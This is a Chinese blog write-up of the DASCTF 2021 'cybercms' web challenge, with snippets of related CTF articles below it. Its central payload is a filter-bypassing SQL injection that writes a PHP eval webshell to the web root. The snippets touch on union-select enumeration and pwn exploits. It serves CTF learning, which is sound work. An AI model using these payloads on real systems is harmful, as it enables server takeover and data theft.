cybercms

最新推荐文章于 2022-04-27 10:42:47 发布
最新推荐文章于 2022-04-27 10:42:47 发布
阅读量131 收藏
点赞数
分类专栏: 2021DASCTF July X CBCTF WP 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/119303589
版权

cybercms

第一步还是先找后台,后台在admin/

/admin/login.php

尝试一波密码发现进不去,

试试admin'发现报错

然后发现有www.zip 备份文件。

对登录框进行了过滤,这边绕了蛮久就不一一写了,直接上payload

最终payload:
url:http://67fa4a9d-62c0-45c9-8233-005c57ec0a7d.node4.buuoj.cn/admin/login.php?action=ck_login
​
user=admin%27/**/union/**/selselectect/**/1,2,3,4,char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62)/**/into/**/outoutfilefile/**/'/var/www/html/shell1.php'#&password=1&code=&submit=true&submit.x=39&submit.y=34

创建一个一句话木马

为这个页面就成功了,访问该页面,成功写入。

 

 

 

 

angelkat
关注
专栏目录
【CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 663
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1346
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
DASCTF July X CBCTF2021 cybercms WP
weixin_48083470的博客
08-02 275
DASCTF July X CBCTF cybercms 是一个cms网站 常规扫面后台文件 扫到一个后台登录网页,这个cms请求量大了后还是会503,403的,不过这个admin也没有多难猜 登录测试 输入点号 发现可以报错 同时尝试/www.zip可以下载源码 这里会对用户名和密码进行过滤,有两个函数, 第一个,过滤了一些内容 会替换为空,那么双写绕过即可 function fl_value($str){ if(empty($str)){return;} return preg_replace
CMS 内容管理系统
weixin_30537391的博客
06-16 1842
http://www.codeplex.com/n2 N2是一个基于Asp.net的内容管理系统 此外,其他的CMS系统也很多 http://ssmax.net/archives/212.html 文章的介绍 先看看国内的: TurboCMS动易内容管理系统帝国网站管理系统 ECMSSupeSite 社区门户系统COMSHARP CMS - 锐商企业CMSphpcms 网站管理系统dedecms...
DASCTF
qq_53755216的博客
04-08 823
ez_serialize 题目网址: http://684f47cd-5c9d-41cb-ad29-98d48096cc9a.machine.dasctf.com/ <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $thi
DASCTF七月赛-web
Pr0m1se1n的博客
08-06 691
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
中软国际e-Park数字化园区综合解决方案
07-09
电子政务方面,中软国际运用其CyberCMS内容管理中间件进行信息发布,采用UWF工作流中间件支持内部办公自动化,以及CRM客户关系系统满足招商管理需求。同时,基于一站式服务的网上申报审批系统和基于GIS的智能化城市...
魔法密文 Writeup| DASCTF Oct X 吉林工师
张麦麦
10-28 461
魔法秘文 这题思路还好吧……但是真的属于把我做吐了的那种……具体见后文 首先给了一个zip文件,解压出来一张魔法少女.png,通过binwalk分析出来隐藏了压缩包。 直接用binwalk -e分离发现压缩包大小有问题。 于是使用 hex 编辑器直接删掉了前面的图片部分,得到一个压缩包。 压缩包中有两个文件,flag.txt是加密的,魔法萝莉简体未加密。 提示内容为:密码为32位中文。 解压出来魔法萝莉简体,在hex视图下,字体文件末尾发现一串 urlcode 编码的字符。 urldecode后得到如
2022DASCTF Apr X FATE 防疫挑战赛 Crypto-wp
mxx307的博客
04-26 2211
2022 DASCTF Apr X FATE 防疫挑战赛 Crypto Wp
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1561
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
Dasctf 6月赛其余pwn WP
qq_31457355的博客
11-01 601
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
2021年 极客谷杯 Web
feng的博客
10-22 805
粗心的开发人员 存在/info,提示发现目录下存在R.class文件,可能导致源代码泄露,请及时处理! 将R.class下载下来拿IDEA打开审计: // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package com.example.demo2; import java.io.BufferedInputStream; import java
2021 MAR-DASCTF drinksometea
qq_37073764的博客
03-31 706
新手第一次见这种题,记录一下 压缩包给了一个exe还有一个png.out,那个png.out不知道干嘛用的。 查一下exe有无加壳,无,拖入ida进行分析。 程序流程不难,就是先从tea.png读入数据,然后经过中间的函数处理,然后把输出输出到tea.png.out。 题目要我们做的就是,用那个out文件,还原出png文件 进入4010A0函数,发现ida根本分析不了: 原来这就是传说中的花指令。 看了别的大佬博客才知道,对于00401116,有红色的这行语句按U,然后在Hex-view那里,把那行数据
ez_website
lastwinn的博客
08-01 127
ez_website 试试后台admin.php直接跳转到后台登录页面 爆破一下密码发现密码为admin888 经过对后台的了解之后,发现一个PC主页标签功能 然后点击随便选择一个风格会有php命令,但是保存c出错 需要开启自定义模块功能,百度一下怎么开启,文章如下 https://www.kancloud.cn/php168/x1_of_qibo/2074671 保存成功后去主页执行代码。 用蚁剑执行readflag命令 ...
2022DASCTF Apr X FATE 防疫挑战赛——【Misc】熟悉的猫
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-27 1003
熟悉的猫 下载文件,补上zip后缀名,解压得到两个文件: flag.zip有密码保护 len5.kdbx文件经过搜索,可以使用keepass打开。打开时发现需要密码。 根据文件名,猜测密码为5位字符,则开始爆破。 首先使用John The Ripper工具转换一下John支持的格式。 然后使用hashcat爆破hash值得到密码。 hashcat -m 13400 keepass.txt -a 0 password.txt --force # m:破解的hash类型,hashcat -h 何查看类
sdut 1446 超级玛丽
aysd68784的博客
01-27 97
http://acm.sdut.edu.cn/sdutoj/problem.php?action=showproblem&problemid=1446 题意:你妹的,我妹的,他妹的,中文题啊,坑妹啊,中文题读错了。。。。。漏掉了条件了,返回的是如果浪子最终跳跃次数多于男爵的最终跳跃次数,只想骂自己,漏掉了个条件搞的自己无可奈何,一直比较的是距离,题目要求比较的是跳跃次数 刚开...
[WP/BUU/CTF]Cookie Store 题解
車鈊的博客
07-31 469
简单题,涉及Cookie的使用方法 存储-Cookie-session-值 base64解码 eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ== // 解码 {"money": 50, "history": []} 后台通过base64存储用户信息,是及其危险的,可以伪造数据 {"money": 100, "history": []} // 编码 eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0= 替换Value,刷新,购买flag即可 ..
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 453
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
ctf.show_web2
Huamang的博客
02-02 794
万能密码回显成功 查询字段数没有回显 那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段,开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值